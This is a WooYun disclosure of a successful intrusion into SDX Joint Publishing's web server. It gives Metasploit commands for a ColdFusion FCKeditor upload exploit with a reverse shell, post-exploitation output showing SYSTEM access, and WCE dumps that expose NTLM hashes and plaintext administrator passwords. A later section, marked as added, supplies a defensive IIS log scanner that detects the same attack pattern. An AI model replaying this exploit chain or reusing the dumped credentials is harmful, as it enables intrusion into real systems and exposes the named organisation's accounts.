Vulnerability summary
Followers: 24
Title: Successful intrusion of SDX Joint Publishing (三联书店)
Submitted: 2015-01-21 19:08
Fixed: 2015-03-07 19:10
Published: 2015-03-07 19:10
Type: Successful intrusion event
Severity: High
Self-assessed Rank: 20
Status: Vendor could not be contacted, or vendor actively ignored the report
Tags: none

Disclosure status:
2015-01-21: Actively contacting the vendor and awaiting vendor acknowledgement; details withheld from the public.
2015-03-07: The vendor has actively ignored the vulnerability; details disclosed to the public.

Brief description: Successful intrusion of SDX Joint Publishing (三联书店), www.sdxjpc.com
Details:

1# Directory scanning found the FCKeditor connector path:
http://www.sdxjpc.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm
2# Searching msf for coldfusion found the matching FCKeditor exploit module:

```
msf > search coldfusion

exploit/windows/http/coldfusion_fckeditor  2009-07-03  excellent  ColdFusion 8.0.1 Arbitrary File Upload and Execute
```

Set the corresponding parameters:

```
msf > use exploit/windows/http/coldfusion_fckeditor
msf exploit(coldfusion_fckeditor) > set RHOST www.sdxjpc.com
msf exploit(coldfusion_fckeditor) > set payload generic/shell_reverse_tcp
msf exploit(coldfusion_fckeditor) > set LHOST XX.XX.XX.XX
msf exploit(coldfusion_fckeditor) > set LPORT 8888
```

Run the payload:

```
msf exploit(coldfusion_fckeditor) > run

[*] Started reverse handler on XX.XX.XX.XX:8888
[*] Sending our POST request...
[*] Upload succeeded! Executing payload...
[*] Command shell session 2 opened (XX.XX.XX.XX:8888 -> 119.40.39.235:4975) at 2015-01-21 10:56:39 +0800

Microsoft Windows XP [版本 5.2.3790]
(C) 版权所有 1985-2001 Microsoft Corp.

d:\ColdFusion8\runtime\bin>ver
ver

Microsoft Windows XP [版本 5.2.3790]
```

Executing other commands:
```
d:\ColdFusion8\runtime\bin>ipconfig /all
ipconfig /all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : sdxjpc
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : BCM5703 Gigabit Ethernet
        Physical Address. . . . . . . . . : 00-0E-7F-AF-2F-C2
        DHCP Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 119.40.39.235
        Subnet Mask . . . . . . . . . . . : 255.255.255.248
        Default Gateway . . . . . . . . . : 119.40.39.233
        DNS Servers . . . . . . . . . . . : 202.106.0.20
                                            202.106.196.115

d:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

d:\ColdFusion8\runtime\bin>netstat -an
[full netstat -an listing omitted; TCP ports listening on 0.0.0.0 included 80, 135, 443, 445, 1521, 3389 and 8080]
```
Dump password hashes:

```
C:\>wce.txt -l
wce.txt -l
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:SDXJPC:00000000000000000000000000000000:B2411B80DB1D162892FCCBC5A5B9C039
SDXJPC$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
IUSR_SDXJPC:SDXJPC:A0003396A423039D97A6AF467D7DC765:E8A716FA9DABF64213E263D12831E7ED

C:\>wce.txt -w
wce.txt -w
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator\SDXJPC:sdxdatabase@fhqs
SDXJPC$\WORKGROUP:
IUSR_SDXJPC\SDXJPC:&y5E=G=P63wB9m
```
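Added here as a defender's example, not part of the original report: a small scanner for IIS W3C access logs that flags the request pattern the write-up relies on, namely any hit on the FCKeditor cfm connector, a 2xx POST to it, and a server-side script subsequently served from the upload directory. It assumes the W3C field order given in the header comment and FCKeditor's default /userfiles/ upload path; the log lines are constructed, not taken from the compromised host.

```python
import re
from dataclasses import dataclass

# Connector path named in the report (lower-cased: IIS paths are case-insensitive).
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm"
# Assumption: FCKeditor's default upload directory; change it if the site configured another.
UPLOAD_DIR = "/userfiles/"
SCRIPT_EXTS = (".cfm", ".cfc", ".cfml", ".jsp")

# W3C extended log fields assumed: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
LOG_RE = re.compile(r"^(\S+ \S+) \S+ (\S+) (\S+) (\S+) (\S+) (\d{3})$")

@dataclass
class Finding:
    when: str
    client: str
    reason: str

def scan(lines):
    """Return one Finding per log line that touches the connector or runs a script from the upload dir."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:          # "#Fields:" comment lines and malformed lines are skipped
            continue
        when, method, stem, query, client, status = m.groups()
        stem = stem.lower()
        if stem == CONNECTOR:
            if method.upper() == "POST" and status.startswith("2"):
                findings.append(Finding(when, client, "FCKeditor connector accepted an upload"))
            else:
                findings.append(Finding(when, client, "FCKeditor connector probed"))
        elif stem.startswith(UPLOAD_DIR) and stem.endswith(SCRIPT_EXTS) and status == "200":
            findings.append(Finding(when, client, "server-side script served from upload dir: " + stem))
    return findings

# Constructed sample log using documentation IP ranges (not real traffic).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-01-21 10:55:01 192.0.2.10 GET /index.cfm - 203.0.113.5 200
2015-01-21 10:55:40 192.0.2.10 GET /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm - 203.0.113.7 200
2015-01-21 10:56:30 192.0.2.10 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm Command=FileUpload&Type=File&CurrentFolder=/ 203.0.113.7 200
2015-01-21 10:56:39 192.0.2.10 GET /userfiles/file/x.cfm - 203.0.113.7 200
2015-01-21 10:57:02 192.0.2.10 GET /userfiles/image/cover.jpg - 203.0.113.5 200""".splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.when, f.client, f.reason)
```

Any hit at all on the connector path is worth an alert on a ColdFusion 8 host, since the report shows it needs no authentication and the resulting shell runs as nt authority\system.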
Proof of vulnerability: (none provided)

Fix recommendation: (none provided)

Copyright notice: please credit the source when reposting: 路人甲 @乌云 (WooYun)

Vendor response

Vulnerability rating:

Comments